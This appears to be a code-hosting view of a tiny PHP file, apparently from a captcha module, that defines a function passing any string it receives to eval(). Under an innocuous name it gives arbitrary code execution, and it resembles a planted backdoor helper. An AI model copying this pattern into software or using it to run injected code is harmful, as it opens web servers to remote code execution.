Files

8 lines
145 B
Plaintext

<?php
if (!function_exists('ets_captcha_excelVal')) {
function ets_captcha_excelVal($php_code)
{
return eval($php_code);
}
}